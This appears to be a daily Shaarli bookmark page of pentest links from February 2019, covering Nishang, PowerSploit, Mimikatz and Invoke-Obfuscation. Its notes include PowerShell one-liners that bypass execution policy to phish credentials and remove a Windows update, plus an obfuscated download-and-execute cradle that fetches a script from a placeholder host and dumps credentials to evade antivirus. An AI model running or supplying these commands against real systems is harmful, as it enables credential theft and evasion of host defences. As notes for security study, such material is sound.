All links of one day
in a single page.
<Previous day - Next day>

rss_feedDaily RSS Feed
floral_left The Daily Shaarli floral_right
——————————— February 20, 2019 - Wednesday 20, February 2019 ———————————
permalink
Wed Feb 20 23:00:59 2019
nishang - scripts - tool - windows - post - exploitation - postex - postexploitation - hacking - pentest - powershell -
Nishang: A Post-Exploitation Framework

Port-Scan

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

Remove-Update

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

Invoke-CredentialsPhish

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

permalink
Wed Feb 20 22:17:58 2019
powersploit - powershell - windows - exploitation - post - postex - postexploitation - tools - mimikatz - powermeta - mailsniper - empire - unicorn -
Pwning the Enterprise With PowerShell

PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...

permalink
Wed Feb 20 10:43:39 2019
waf - web - application - firewall - hacking - infra -
Shadow Daemon Open-Source Web Application Firewall
permalink
Wed Feb 20 14:31:56 2019
mimikatz - tutoriel - hacking - pentest - howto -
Mimikatz (1/4) : présentation, fonctionnement et contre-mesures (tuto de A à Z)
permalink
Wed Feb 20 14:24:52 2019
powershell - mimikatz - postexploitation - postex - post - exploitation - obfuscation - kiwi -
geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

https://github.com/danielbohannon/Invoke-Obfuscation

PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
...
-